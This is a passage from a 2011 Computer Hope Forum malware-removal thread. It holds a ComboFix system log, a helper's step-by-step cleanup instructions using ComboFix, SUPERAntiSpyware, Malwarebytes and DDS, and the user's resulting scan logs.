[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\RTHDCPL]
2009-10-06 08:3418750976----a-w-c:\windows\RTHDCPL.EXE
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\SAOB Monitor]
2011-05-10 16:572536440----a-w-c:\program files\Acronis\TrueImageHome\OnlineBackupStandalone\TrueImageMonitor.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\StartCCC]
2009-09-19 04:2598304----a-w-c:\program files\ATI Technologies\ATI.ACE\Core-Static\CLIStart.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\SunJavaUpdateSched]
2010-10-29 12:49249064----a-w-c:\program files\Common Files\Java\Java Update\jusched.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\SUPERAntiSpyware]
2011-06-10 16:262424192----a-w-c:\program files\SUPERAntiSpyware\SUPERAntiSpyware.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\TrueImageMonitor.exe]
2011-05-17 20:135550792----a-w-c:\program files\Acronis\TrueImageHome\TrueImageMonitor.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\services]
"Secunia Update Agent"=2 (0x2)
"Secunia PSI Agent"=2 (0x2)
"Ati HotKey Poller"=2 (0x2)
"JavaQuickStarterService"=2 (0x2)
"AcrSch2Svc"=2 (0x2)
.
[HKLM\~\services\sharedaccess\parameters\firewallpolicy\standardprofile\AuthorizedApplications\List]
"%windir%\\Network Diagnostic\\xpnetdiag.exe"=
"%windir%\\system32\\sessmgr.exe"=
"c:\\Program Files\\HP\\Digital Imaging\\bin\\hpqtra08.exe"=
"c:\\Program Files\\HP\\Digital Imaging\\bin\\hpqste08.exe"=
"c:\\Program Files\\HP\\Digital Imaging\\bin\\hposid01.exe"=
"c:\\Program Files\\HP\\Digital Imaging\\bin\\hpiscnapp.exe"=
"c:\\Program Files\\HP\\Digital Imaging\\bin\\hpqkygrp.exe"=
"c:\\Program Files\\Spotify\\spotify.exe"=
"c:\\Program Files\\Java\\jre6\\bin\\javaw.exe"=
"c:\\Program Files\\DC++\\DCPlusPlus.exe"=
"c:\\Program Files\\HP\\Digital Imaging\\bin\\hpqpse.exe"=
"c:\\Program Files\\Common Files\\HP\\Digital Imaging\\bin\\hpqPhotoCrm.exe"=
"c:\\Program Files\\HP\\Digital Imaging\\bin\\hpqsudi.exe"=
"c:\\Program Files\\HP\\Digital Imaging\\bin\\hpqpsapp.exe"=
"c:\\Program Files\\TeamViewer\\Version6\\TeamViewer.exe"=
"c:\\Program Files\\TeamViewer\\Version6\\TeamViewer_Service.exe"=
.
R0 tdrpman273;Acronis Try&DECIDE and Restore Points filter (build 273);c:\windows\system32\drivers\tdrpm273.sys [08/05/2011 23:19 752128]
R1 aswSnx;aswSnx;c:\windows\system32\drivers\aswSnx.sys [06/06/2011 11:22 441176]
R1 aswSP;aswSP;c:\windows\system32\drivers\aswSP.sys [06/06/2011 11:22 307928]
R1 SASDIFSV;SASDIFSV;c:\program files\SUPERAntiSpyware\sasdifsv.sys [17/02/2010 20:25 12872]
R1 SASKUTIL;SASKUTIL;c:\program files\SUPERAntiSpyware\SASKUTIL.SYS [10/05/2010 20:41 67656]
R2 afcdpsrv;Acronis Nonstop Backup Service;c:\program files\Common Files\Acronis\CDP\afcdpsrv.exe [08/05/2011 23:19 3246040]
R2 aswFsBlk;aswFsBlk;c:\windows\system32\drivers\aswFsBlk.sys [06/06/2011 11:22 19544]
R2 MBAMService;MBAMService;c:\program files\Malwarebytes' Anti-Malware\mbamservice.exe [06/10/2010 17:07 366640]
R3 afcdp;afcdp;c:\windows\system32\drivers\afcdp.sys [08/05/2011 23:19 167968]
R3 MBAMProtector;MBAMProtector;c:\windows\system32\drivers\mbam.sys [06/10/2010 17:07 22712]
S1 MpKsl27aa9cbe;MpKsl27aa9cbe;\??\c:\documents and settings\All Users\Application Data\Microsoft\Microsoft Antimalware\Definition Updates\{5CBE358E-FB9E-42B0-91C3-0ED11A46499B}\MpKsl27aa9cbe.sys --> c:\documents and settings\All Users\Application Data\Microsoft\Microsoft Antimalware\Definition Updates\{5CBE358E-FB9E-42B0-91C3-0ED11A46499B}\MpKsl27aa9cbe.sys [?]
S1 MpKsl4965f692;MpKsl4965f692;\??\c:\documents and settings\All Users\Application Data\Microsoft\Microsoft Antimalware\Definition Updates\{B94C2A1F-2A70-45B2-8BDB-24A63750906F}\MpKsl4965f692.sys --> c:\documents and settings\All Users\Application Data\Microsoft\Microsoft Antimalware\Definition Updates\{B94C2A1F-2A70-45B2-8BDB-24A63750906F}\MpKsl4965f692.sys [?]
S1 MpKsl82abaab5;MpKsl82abaab5;\??\c:\documents and settings\All Users\Application Data\Microsoft\Microsoft Antimalware\Definition Updates\{F553CFB7-36B1-404E-8DC1-3F6E5D6A268A}\MpKsl82abaab5.sys --> c:\documents and settings\All Users\Application Data\Microsoft\Microsoft Antimalware\Definition Updates\{F553CFB7-36B1-404E-8DC1-3F6E5D6A268A}\MpKsl82abaab5.sys [?]
S1 MpKsla6a28098;MpKsla6a28098;c:\documents and settings\All Users\Application Data\Microsoft\Microsoft Antimalware\Definition Updates\{E3544FD3-0E42-4B6D-875F-784AE3705A58}\MpKsla6a28098.sys [30/03/2011 20:38 28752]
S2 KMService;KMService;c:\windows\system32\srvany.exe [21/11/2010 02:33 8192]
S3 Ambfilt;Ambfilt;c:\windows\system32\drivers\Ambfilt.sys [06/10/2010 16:44 1684736]
S3 appliandMP;appliandMP;


S3 MSICDSetup;MSICDSetup;\??\d:\cdriver.sys --> d:\CDriver.sys [?]
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows nt\currentversion\svchost]
HPZ12REG_MULTI_SZ Pml Driver HPZ12 Net Driver HPZ12
hpdevmgmtREG_MULTI_SZ hpqcxs08 hpqddsvc
.
Contents of the 'Scheduled Tasks' folder
.
2011-03-30 c:\windows\Tasks\RealUpgradeLogonTaskS-1-5-21-861567501-1035525444-682003330-1004.job
- c:\program files\Real\RealUpgrade\realupgrade.exe [2010-06-03 01:02]
.
2011-06-10 c:\windows\Tasks\RealUpgradeScheduledTaskS-1-5-21-861567501-1035525444-682003330-1004.job
- c:\program files\Real\RealUpgrade\realupgrade.exe [2010-06-03 01:02]
.
2011-06-15 c:\windows\Tasks\User_Feed_Synchronization-{12FB04A5-A76E-4C86-A1A2-0A1F5DA00FA1}.job
- c:\windows\system32\msfeedssync.exe [2009-03-08 02:31]
.
.
------- Supplementary Scan -------
.
uStart Page = hxxp://portail.free.fr/
Trusted Zone: dailymail.co.uk\www
Trusted Zone: telegraph.co.uk\puzzles
TCP: DhcpNameServer = 212.27.40.240 212.27.40.241
.
- - - - ORPHANS REMOVED - - - -
.
Notify-SDWinLogon - SDWinLogon.dll
MSConfigStartUp-00PCTFW - c:\program files\PC Tools Firewall Plus\FirewallGUI.exe
MSConfigStartUp-MSSE - c:\program files\Microsoft Security Essentials\msseces.exe
MSConfigStartUp-Spybot-S&D Cleaning - c:\program files\Spybot - Search & Destroy 2\SDCleaner.exe
MSConfigStartUp-Startup Manager - c:\program files\Advanced System Optimizer\startUp manager.exe
MSConfigStartUp-TkBellExe - c:\program files\Common Files\Real\Update_OB\realsched.exe
.
.
.
**************************************************************************
.
catchme 0.3.1398 W2K/XP/Vista - rootkit/stealth malware detector by Gmer, http://www.gmer.net
Rootkit scan 2011-06-15 17:45
Windows 5.1.2600 Service Pack 3 NTFS
.
scanning hidden processes ...
.
scanning hidden autostart entries ...
.
scanning hidden files ...
.
scan completed successfully
hidden files: 0
.
**************************************************************************
.
--------------------- LOCKED REGISTRY KEYS ---------------------
.
[HKEY_LOCAL_MACHINE\software\Microsoft\Windows NT\CurrentVersion\Winlogon\GPExtensions\{3610eda5-77ef-11d2-8dc5-00c04fa31a66}]
@DACL=(02 0000)
@="Microsoft Disk Quota"
"NoMachinePolicy"=dword:00000000
"NoUserPolicy"=dword:00000001
"NoSlowLink"=dword:00000001
"NoBackgroundPolicy"=dword:00000001
"NoGPOListChanges"=dword:00000001
"PerUserLocalSettings"=dword:00000000
"RequiresSuccessfulRegistry"=dword:00000001
"EnableAsynchronousProcessing"=dword:00000000
"DllName"=expand:"dskquota.dll"
"ProcessGroupPolicy"="ProcessGroupPolicy"
.
[HKEY_LOCAL_MACHINE\software\Microsoft\Windows NT\CurrentVersion\Winlogon\GPExtensions\{4CFB60C1-FAA6-47f1-89AA-0B18730C9FD3}]
@DACL=(02 0000)
@="Internet Explorer Zonemapping"
"DllName"="c:\\WINDOWS\\system32\\iedkcs32.dll"
"ProcessGroupPolicy"="ProcessGroupPolicyForZoneMap"
"NoGPOListChanges"=dword:00000001
"RequiresSucessfulRegistry"=dword:00000001
"DisplayName"="@c:\\WINDOWS\\system32\\iedkcs32.dll.mui,-3051"
"RequiresSuccessfulRegistry"=dword:00000001
.
[HKEY_LOCAL_MACHINE\software\Microsoft\Windows NT\CurrentVersion\Winlogon\GPExtensions\{7B849a69-220F-451E-B3FE-2CB811AF94AE}]
@DACL=(02 0000)
@="Internet Explorer User Accelerators"
"DisplayName"="@c:\\WINDOWS\\system32\\iedkcs32.dll.mui,-3051"
"DllName"="c:\\WINDOWS\\system32\\iedkcs32.dll"
"NoGPOListChanges"=dword:00000001
"ProcessGroupPolicy"="ProcessGroupPolicyForActivities"
"ProcessGroupPolicyEx"="ProcessGroupPolicyForActivitiesEx"
"RequiresSuccessfulRegistry"=dword:00000001
.
[HKEY_LOCAL_MACHINE\software\Microsoft\Windows NT\CurrentVersion\Winlogon\GPExtensions\{827D319E-6EAC-11D2-A4EA-00C04F79F83A}]
@DACL=(02 0000)
"ProcessGroupPolicy"="SceProcessSecurityPolicyGPO"
"GenerateGroupPolicy"="SceGenerateGroupPolicy"
"ExtensionRsopPlanningDebugLevel"=dword:00000001
"ProcessGroupPolicyEx"="SceProcessSecurityPolicyGPOEx"
"ExtensionDebugLevel"=dword:00000001
"DllName"=expand:"scecli.dll"
@="Security"
"NoUserPolicy"=dword:00000001
"NoGPOListChanges"=dword:00000001
"EnableAsynchronousProcessing"=dword:00000001
"MaxNoGPOListChangesInterval"=dword:000003c0
.
[HKEY_LOCAL_MACHINE\software\Microsoft\Windows NT\CurrentVersion\Winlogon\GPExtensions\{A2E30F80-D7DE-11d2-BBDE-00C04F86AE3B}]
@DACL=(02 0000)
"ProcessGroupPolicyEx"="ProcessGroupPolicyEx"
"GenerateGroupPolicy"="GenerateGroupPolicy"
"ProcessGroupPolicy"="ProcessGroupPolicy"
"DllName"="c:\\WINDOWS\\system32\\iedkcs32.dll"
@="Internet Explorer Branding"
"NoSlowLink"=dword:00000001
"NoBackgroundPolicy"=dword:00000000
"NoGPOListChanges"=dword:00000001
"NoMachinePolicy"=dword:00000001
"DisplayName"="@c:\\WINDOWS\\system32\\iedkcs32.dll.mui,-3014"
.
[HKEY_LOCAL_MACHINE\software\Microsoft\Windows NT\CurrentVersion\Winlogon\GPExtensions\{B1BE8D72-6EAC-11D2-A4EA-00C04F79F83A}]
@DACL=(02 0000)
"ProcessGroupPolicy"="SceProcessEFSRecoveryGPO"
"DllName"=expand:"scecli.dll"
@="EFS recovery"
"NoUserPolicy"=dword:00000001
"NoGPOListChanges"=dword:00000001
"RequiresSuccessfulRegistry"=dword:00000001
.
[HKEY_LOCAL_MACHINE\software\Microsoft\Windows NT\CurrentVersion\Winlogon\GPExtensions\{B587E2B1-4D59-4e7e-AED9-22B9DF11D053}]
@DACL=(02 0000)
@="802.3 Group Policy"
"DisplayName"=expand:"@dot3gpclnt.dll,-100"
"ProcessGroupPolicyEx"="ProcessLANPolicyEx"
"GenerateGroupPolicy"="GenerateLANPolicy"
"DllName"=expand:"dot3gpclnt.dll"
"NoUserPolicy"=dword:00000001
"NoGPOListChanges"=dword:00000001
.
[HKEY_LOCAL_MACHINE\software\Microsoft\Windows NT\CurrentVersion\Winlogon\GPExtensions\{C631DF4C-088F-4156-B058-4375F0853CD8}]
@DACL=(02 0000)
@="Microsoft Offline Files"
"DllName"=expand:"%SystemRoot%\\System32\\cscui.dll"
"EnableAsynchronousProcessing"=dword:00000000
"NoBackgroundPolicy"=dword:00000000
"NoGPOListChanges"=dword:00000000
"NoMachinePolicy"=dword:00000000
"NoSlowLink"=dword:00000000
"NoUserPolicy"=dword:00000001
"PerUserLocalSettings"=dword:00000000
"ProcessGroupPolicy"="ProcessGroupPolicy"
"RequiresSuccessfulRegistry"=dword:00000001
.
[HKEY_LOCAL_MACHINE\software\Microsoft\Windows NT\CurrentVersion\Winlogon\GPExtensions\{c6dc5466-785a-11d2-84d0-00c04fb169f7}]
@DACL=(02 0000)
@="Software Installation"
"DllName"=expand:"appmgmts.dll"
"ProcessGroupPolicyEx"="ProcessGroupPolicyObjectsEx"
"GenerateGroupPolicy"="GenerateGroupPolicy"
"NoBackgroundPolicy"=dword:00000000
"RequiresSucessfulRegistry"=dword:00000000
"NoSlowLink"=dword:00000001
"PerUserLocalSettings"=dword:00000001
"EventSources"=multi:"(Application Management,Application)\00(MsiInstaller,Application)\00\00"
.
[HKEY_LOCAL_MACHINE\software\Microsoft\Windows NT\CurrentVersion\Winlogon\GPExtensions\{CF7639F3-ABA2-41DB-97F2-81E2C5DBFC5D}]
@DACL=(02 0000)
@="Internet Explorer Machine Accelerators"
"DisplayName"="@c:\\WINDOWS\\system32\\iedkcs32.dll.mui,-3051"
"DllName"="c:\\WINDOWS\\system32\\iedkcs32.dll"
"NoGPOListChanges"=dword:00000001
"ProcessGroupPolicy"="ProcessGroupPolicyForActivities"
"ProcessGroupPolicyEx"="ProcessGroupPolicyForActivitiesEx"
"RequiresSuccessfulRegistry"=dword:00000001
.
[HKEY_LOCAL_MACHINE\software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\!SASWinLogon]
@DACL=(02 0000)
"DllName"="c:\\Program Files\\SUPERAntiSpyware\\SASWINLO.DLL"
"Logon"="SABWINLOLogon"
"Logoff"="SABWINLOLogoff"
"Startup"="SABWINLOStartup"
"Shutdown"="SABWINLOShutdown"
"Asynchronous"=dword:00000000
"Impersonate"=dword:00000000
.
[HKEY_LOCAL_MACHINE\software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\AtiExtEvent]
@DACL=(02 0000)
"DLLName"="Ati2evxx.dll"
"Asynchronous"=dword:00000000
"Impersonate"=dword:00000001
"Lock"="AtiLockEvent"
"Logoff"="AtiLogoffEvent"
"Logon"="AtiLogonEvent"
"Disconnect"="AtiDisConnectEvent"
"Reconnect"="AtiReConnectEvent"
"Safe"=dword:00000000
"Shutdown"="AtiShutdownEvent"
"StartScreenSaver"="AtiStartScreenSaverEvent"
"StartShell"="AtiStartShellEvent"
"Startup"="AtiStartupEvent"
"StopScreenSaver"="AtiStopScreenSaverEvent"
"Unlock"="AtiUnLockEvent"
.
[HKEY_LOCAL_MACHINE\software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\crypt32chain]
@DACL=(02 0000)
"Asynchronous"=dword:00000000
"Impersonate"=dword:00000000
"DllName"=expand:"crypt32.dll"
"Logoff"="ChainWlxLogoffEvent"
.
[HKEY_LOCAL_MACHINE\software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\cryptnet]
@DACL=(02 0000)
"Asynchronous"=dword:00000000
"Impersonate"=dword:00000000
"DllName"=expand:"cryptnet.dll"
"Logoff"="CryptnetWlxLogoffEvent"
.
[HKEY_LOCAL_MACHINE\software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\cscdll]
@DACL=(02 0000)
"DLLName"="cscdll.dll"
"Logon"="WinlogonLogonEvent"
"Logoff"="WinlogonLogoffEvent"
"ScreenSaver"="WinlogonScreenSaverEvent"
"Startup"="WinlogonStartupEvent"
"Shutdown"="WinlogonShutdownEvent"
"StartShell"="WinlogonStartShellEvent"
"Impersonate"=dword:00000000
"Asynchronous"=dword:00000001
.
[HKEY_LOCAL_MACHINE\software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\dimsntfy]
@DACL=(02 0000)
"Asynchronous"=dword:00000001
"DllName"=expand:"%SystemRoot%\\System32\\dimsntfy.dll"
"Startup"="WlDimsStartup"
"Shutdown"="WlDimsShutdown"
"Logon"="WlDimsLogon"
"Logoff"="WlDimsLogoff"
"StartShell"="WlDimsStartShell"
"Lock"="WlDimsLock"
"Unlock"="WlDimsUnlock"
.
[HKEY_LOCAL_MACHINE\software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\ScCertProp]
@DACL=(02 0000)
"DLLName"="wlnotify.dll"
"Logon"="SCardStartCertProp"
"Logoff"="SCardStopCertProp"
"Lock"="SCardSuspendCertProp"
"Unlock"="SCardResumeCertProp"
"Enabled"=dword:00000001
"Impersonate"=dword:00000001
"Asynchronous"=dword:00000001
.
[HKEY_LOCAL_MACHINE\software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\Schedule]
@DACL=(02 0000)
"Asynchronous"=dword:00000000
"DllName"=expand:"wlnotify.dll"
"Impersonate"=dword:00000000
"StartShell"="SchedStartShell"
"Logoff"="SchedEventLogOff"
.
[HKEY_LOCAL_MACHINE\software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\sclgntfy]
@DACL=(02 0000)
"Logoff"="WLEventLogoff"
"Impersonate"=dword:00000000
"Asynchronous"=dword:00000001
"DllName"=expand:"sclgntfy.dll"
.
[HKEY_LOCAL_MACHINE\software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\SensLogn]
@DACL=(02 0000)
"DLLName"="WlNotify.dll"
"Lock"="SensLockEvent"
"Logon"="SensLogonEvent"
"Logoff"="SensLogoffEvent"
"Safe"=dword:00000001
"MaxWait"=dword:00000258
"StartScreenSaver"="SensStartScreenSaverEvent"
"StopScreenSaver"="SensStopScreenSaverEvent"
"Startup"="SensStartupEvent"
"Shutdown"="SensShutdownEvent"
"StartShell"="SensStartShellEvent"
"PostShell"="SensPostShellEvent"
"Disconnect"="SensDisconnectEvent"
"Reconnect"="SensReconnectEvent"
"Unlock"="SensUnlockEvent"
"Impersonate"=dword:00000001
"Asynchronous"=dword:00000001
.
[HKEY_LOCAL_MACHINE\software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\termsrv]
@DACL=(02 0000)
"Asynchronous"=dword:00000000
"DllName"=expand:"wlnotify.dll"
"Impersonate"=dword:00000000
"Logoff"="TSEventLogoff"
"Logon"="TSEventLogon"
"PostShell"="TSEventPostShell"
"Shutdown"="TSEventShutdown"
"StartShell"="TSEventStartShell"
"Startup"="TSEventStartup"
"MaxWait"=dword:00000258
"Reconnect"="TSEventReconnect"
"Disconnect"="TSEventDisconnect"
.
[HKEY_LOCAL_MACHINE\software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\wlballoon]
@DACL=(02 0000)
"DLLName"="wlnotify.dll"
"Logon"="RegisterTicketExpiredNotificationEvent"
"Logoff"="UnregisterTicketExpiredNotificationEvent"
"Impersonate"=dword:00000001
"Asynchronous"=dword:00000001
.
[HKEY_LOCAL_MACHINE\software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList]
@DACL=(02 0000)
"HelpAssistant"=dword:00000000
"TsInternetUser"=dword:00000000
"SQLAgentCmdExec"=dword:00000000
"NetShowServices"=dword:00000000
"IWAM_"=dword:00010000
"IUSR_"=dword:00010000
"VUSR_"=dword:00010000
.
Completion time: 2011-06-15 17:47:46
ComboFix-quarantined-files.txt 2011-06-15 15:47
.
Pre-Run: 36,801,867,776 bytes free
Post-Run: 36,803,469,312 bytes free
.
WindowsXP-KB310994-SP2-Home-BootDisk-ENU.exe
[boot loader]
timeout=2
default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS
[operating systems]
c:\cmdcons\BOOTSECT.DAT="Microsoft Windows Recovery Console" /cmdcons
UnsupportedDebug="do not select this" /debug
multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Microsoft Windows XP Home Edition" /noexecute=optin /fastdetect
.
- - End Of File - - 2FA1A556B7F7212176187E13F8EAD57D

Hello and welcome to Computer Hope Forum. My name is Dave. I will be helping you out with your particular problem on your computer.

1. I will be working on your Malware issues. This may or may not solve other issues you have with your machine.
2. The fixes are specific to your problem and should only be used for this issue on this machine.
3. If you don't know or understand something, PLEASE don't hesitate to ask.
4. Please DO NOT run any other tools or scans while I am helping you.
5. It is important that you reply to this thread. Do not start a new topic.
6. Your security programs may give warnings for some of the tools I will ask you to use. Be assured, any links I give are safe.
7. Absence of symptoms does not mean that everything is clear.

If you can't access the internet with your infected computer you will have to download and transfer any programs to the computer you're using now and transfer them to the infected computer with a CD-RW or a USB storage device. I prefer a CD because a storage device can get infected. If you use a storage device hold the shift key down while inserting the USB storage device for about 10 secs. You will also have to transfer the logs you receive back to the good computer using the same method until we can get the computer back on-line.
******************************************************
First of all, you have two AV programs running on your computer which is a no-no. Either avast! Antivirus or AV: Microsoft Security Essentials will have to be disabled/uninstalled. I would stick with MSE, if I were you.

Re-running ComboFix to remove infections:

  • Close any open browsers.
  • Close/disable all anti virus and anti malware programs so they do not interfere with the running of ComboFix.
  • Open notepad and copy/paste the text in the quotebox below into it:
    Quote
    KillAll::

    DDS::
    Trusted Zone: dailymail.co.uk\www
    Trusted Zone: telegraph.co.uk\puzzles

  • Save this as CFScript.txt, in the same location as ComboFix.exe



  • Referring to the picture above, drag CFScript into ComboFix.exe
  • When finished, it shall produce a log for you at C:\ComboFix.txt
  • I don't need to see the log from this action.
******************************************************
SUPERAntiSpyware

If you already have SUPERAntiSpyware be sure to check for updates before scanning!

Download SuperAntispyware Free Edition (SAS)
* Double-click the icon on your desktop to run the installer.
* When asked to Update the program definitions, click Yes
* If you encounter any problems while downloading the updates, manually download and unzip them from here
* Next click the Preferences button.

• Under Start-Up Options uncheck Start SUPERAntiSpyware when Windows starts
* Click the Scanning Control tab.
* Under Scanner Options make sure only the following are checked:

• Close browsers before scanning
• Scan for tracking cookies
• Terminate memory threats before quarantining
Please leave the others unchecked

• Click the Close button to leave the control center screen.

* On the main screen click Scan your computer
* On the left check the box for the drive you are scanning.
* On the right choose Perform Complete Scan
* Click Next to start the scan. Please be patient while it scans your computer.
* After the scan is complete a summary box will appear. Click OK
* Make sure everything in the white box has a check next to it, then click Next
* It will quarantine what it found and if it asks if you want to reboot, click Yes

• To retrieve the removal information please do the following:
• After reboot, double-click the SUPERAntiSpyware icon on your desktop.
• Click Preferences. Click the Statistics/Logs tab.

• Under Scanner Logs, double-click SUPERAntiSpyware Scan Log.

• It will open in your default text editor (preferably Notepad).
• Save the notepad file to your desktop by clicking (in notepad) File > Save As...

* Save the log somewhere you can easily find it. (normally the desktop)
* Click close and close again to exit the program.
* Copy and Paste the log in your post.
*********************************************
Please download Malwarebytes Anti-Malware from here.
Double Click mbam-setup.exe to install the application.
  • Make sure a checkmark is placed next to Update Malwarebytes' Anti-Malware and Launch Malwarebytes Anti-Malware, then click Finish.
  • If an update is found, it will download and install the latest version.
  • Once the program has loaded, select "Perform Full Scan", then click Scan.
  • The scan may take some time to finish, so please be patient.
  • When the scan is complete, click OK, then Show Results to view the results.
  • Make sure that everything is checked, and click Remove Selected.
  • When disinfection is completed, a log will open in Notepad and you may be prompted to Restart. (See Extra Note)
  • Please save the log to a location you will remember.
  • The log is automatically saved by MBAM and can be viewed by clicking the Logs tab in MBAM.
  • Copy and paste the entire report in your next reply.
Extra Note:

If MBAM encounters a file that is difficult to remove, you will be presented with 1 of 2 prompts, click OK to either and let MBAM proceed with the disinfection process. If asked to restart the computer, please do so immediately.
*********************************************************
Download DDS from HERE or HERE and save it to your desktop.

Vista users right click on dds and select Run as administrator (you will receive a UAC prompt, please allow it)

* XP users Double click on dds to run it.
* If your antivirus or firewall try to block DDS then please allow it to run.
* When finished DDS will open two (2) logs.

1) DDS.txt
2) Attach.txt

* Save both logs to your desktop.
* Please copy and paste the entire contents of both logs in your next reply.

Note: DDS will instruct you to post the Attach.txt log as an attachment.
Please just post it as you would any other log by copying and pasting it into the reply.

Thank you SD.
Can I just point out that I did have MSE and AVG Firewall but these were both removed. They are no longer in msconfig, don't appear in task manager, and I have removed all folders. Can't see why Combofix is still highlighting these??
Anyway, logs requested are as follows -

SUPERAntiSpyware Scan Log
http://www.superantispyware.com

Generated 06/16/2011 at 03:29 PM

Application Version : 4.54.1000

Core Rules Database Version : 7274
Trace Rules Database Version: 5086

Scan type : Complete Scan
Total Scan Time : 00:17:21

Memory items scanned : 378
Memory threats detected : 0
Registry items scanned : 5460
Registry threats detected : 0
File items scanned : 36531
File threats detected : 32

Adware.Tracking Cookie

Malwarebytes' Anti-Malware 1.51.0.1200
www.malwarebytes.org

Database version: 6870

Windows 5.1.2600 Service Pack 3
Internet Explorer 8.0.6001.18702

16/06/2011 15:42:25
mbam-log-2011-06-16 (15-42-25).txt

Scan type: Full scan (C:\|)
Objects scanned: 182958
Time elapsed: 6 minute(s), 58 second(s)

Memory Processes Infected: 0
Memory Modules Infected: 0
Registry Keys Infected: 0
Registry Values Infected: 0
Registry Data Items Infected: 0
Folders Infected: 0
Files Infected: 0

Memory Processes Infected:
(No malicious items detected)

Memory Modules Infected:
(No malicious items detected)

Registry Keys Infected:
(No malicious items detected)

Registry Values Infected:
(No malicious items detected)

Registry Data Items Infected:
(No malicious items detected)

Folders Infected:
(No malicious items detected)

Files Infected:
(No malicious items detected)

.
DDS (Ver_2011-06-12.02) - NTFSx86
Internet Explorer: 8.0.6001.18702
Run by briann at 15:43:53 on 2011-06-16
Microsoft Windows XP Home Edition 5.1.2600.3.1252.44.1033.18.3327.2582 [GMT 2:00]
.
AV: avast! Antivirus *Enabled/Updated* {7591DB91-41F0-48A3-B128-1A293FD8233D}
AV: Microsoft Security Essentials *Disabled/Updated* {BCF43643-A118-4432-AEDE-D861FCBCFCDF}
FW: AVG Firewall *Disabled*
.
============== Running Processes ===============
.
C:\WINDOWS\system32\svchost.exe -k DcomLaunch
svchost.exe
C:\WINDOWS\System32\svchost.exe -k netsvcs
svchost.exe
svchost.exe
C:\Program Files\AVAST Software\Avast\AvastSvc.exe
C:\WINDOWS\system32\spoolsv.exe
svchost.exe
C:\Program Files\Common Files\Acronis\CDP\afcdpsrv.exe
C:\WINDOWS\system32\svchost.exe -k hpdevmgmt
C:\Program Files\Malwarebytes' Anti-Malware\mbamservice.exe
C:\Program Files\Common Files\Java\Java Update\jusched.exe
C:\Program Files\Malwarebytes' Anti-Malware\mbamgui.exe
C:\Program Files\AVAST Software\Avast\avastUI.exe
C:\WINDOWS\System32\svchost.exe -k HPZ12
C:\WINDOWS\System32\svchost.exe -k HPZ12
C:\WINDOWS\system32\svchost.exe -k imgsvc
C:\WINDOWS\explorer.exe
C:\WINDOWS\system32\ctfmon.exe
C:\Program Files\SUPERAntiSpyware\SUPERAntiSpyware.exe
C:\Program Files\Internet Explorer\iexplore.exe
C:\Program Files\Internet Explorer\iexplore.exe
C:\Program Files\Internet Explorer\iexplore.exe
.
============== Pseudo HJT Report ===============
.
uStart Page = hxxp://portail.free.fr/
mURLSearchHooks: H - No File
BHO: HP Print Enhancer: {0347c33e-8762-4905-bf09-768834316c61} - c:\program files\hp\digital imaging\smart web printing\hpswp_printenhancer.dll
BHO: avast! WebRep: {8e5e2654-ad2d-48bf-ac2d-d17f00898d06} - c:\program files\avast software\avast\aswWebRepIE.dll
BHO: WOT Helper: {c920e44a-7f78-4e64-bdd7-a57026e7feb7} - c:\program files\wot\WOT.dll
BHO: Java(tm) Plug-In 2 SSV Helper: {dbc80044-a445-435b-bc74-9c25c1c588a9} - c:\program files\java\jre6\bin\jp2ssv.dll
BHO: JQSIEStartDetectorImpl Class: {e7e6f031-17ce-4c07-bc86-eabfe594f69c} - c:\program files\java\jre6\lib\deploy\jqs\ie\jqs_plugin.dll
BHO: HP Smart BHO Class: {ffffffff-cf4e-4f2b-bdc2-0e72e116a856} - c:\program files\hp\digital imaging\smart web printing\hpswp_BHO.dll
TB: WOT: {71576546-354d-41c9-aae8-31f2ec22bf0d} - c:\program files\wot\WOT.dll
TB: avast! WebRep: {8e5e2654-ad2d-48bf-ac2d-d17f00898d06} - c:\program files\avast software\avast\aswWebRepIE.dll
uRun: [ctfmon.exe] c:\windows\system32\ctfmon.exe
mRun: [SunJavaUpdateSched] c:\program files\common files\java\java update\jusched.exe
mRun: [Malwarebytes' Anti-Malware] "c:\program files\malwarebytes' anti-malware\mbamgui.exe" /starttray
mRun: [avast] "c:\program files\avast software\avast\avastUI.exe" /nogui
mPolicies-system: EnableLinkedConnections = 1 (0x1)
IE: {e2e2dd38-d088-4134-82b7-f2ba38496583} - %windir%\Network Diagnostic\xpnetdiag.exe
IE: {DDE87865-83C5-48c4-8357-2F5B1AA84522} - {DDE87865-83C5-48c4-8357-2F5B1AA84522} - c:\program files\hp\digital imaging\smart web printing\hpswp_BHO.dll
DPF: {17492023-C23A-453E-A040-C7C580BBF700} - hxxp://download.microsoft.com/download/E/5/6/E5611B10-0D6D-4117-8430-A67417AA88CD/LegitCheckControl.cab
DPF: {8AD9C840-044E-11D1-B3E9-00805F499D93} - hxxp://java.sun.com/update/1.6.0/jinstall-1_6_0_24-windows-i586.cab
DPF: {CAFEEFAC-0016-0000-0024-ABCDEFFEDCBA} - hxxp://java.sun.com/update/1.6.0/jinstall-1_6_0_24-windows-i586.cab
DPF: {CAFEEFAC-FFFF-FFFF-FFFF-ABCDEFFEDCBA} - hxxp://java.sun.com/update/1.6.0/jinstall-1_6_0_24-windows-i586.cab
